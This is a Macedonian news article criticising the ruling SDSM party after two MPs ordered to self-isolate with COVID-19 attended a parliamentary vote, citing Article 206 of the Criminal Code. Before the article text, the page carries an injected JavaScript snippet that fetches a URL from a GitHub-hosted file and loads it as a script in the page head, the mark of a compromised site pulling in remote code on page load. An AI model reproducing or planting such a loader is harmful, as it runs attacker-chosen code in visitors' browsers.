;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Твитер: Нема амбулантни возила за итни случаи - за партиски цели на СДСМ има - Антропол
АктуелноЛокално

Твитер: Нема амбулантни возила за итни случаи – за партиски цели на СДСМ има

Јавноста жесток реагираше на денешното гласање во Собрание од страна на заразени пратеници со корона-вирус, со што беше прекршен Кривичниот законик. Односно, иако опозицијата неколку недели чека да се изгласа пакетот економски мерки, сепак владата на СДСМ инсистираше да се одржи прво 32-та седница, поради што донесе во Собрание пратеници со решение за самоизолација. Со овој чин, пратениците Мирослав Богдановски и Бисера Костадиновска Стојчевска го прекршија член 206 од Кривичниот законик кој предвидува дека „тој што за време на епидемија на некоја опасна заразна болест не постапи според прописите или наредбите со кои се определуваат мерки за нејзиното сузбивање или спречување, ќе се казни со парична казна или со затвор до една година.”

Реакциите на социјалните мрежи се дека со ваквиот чин, власта го деградира трудот на сите здравствени работници и на граѓаните кои цела година се под рестрикции поради лошото менаџирање со пандемијата.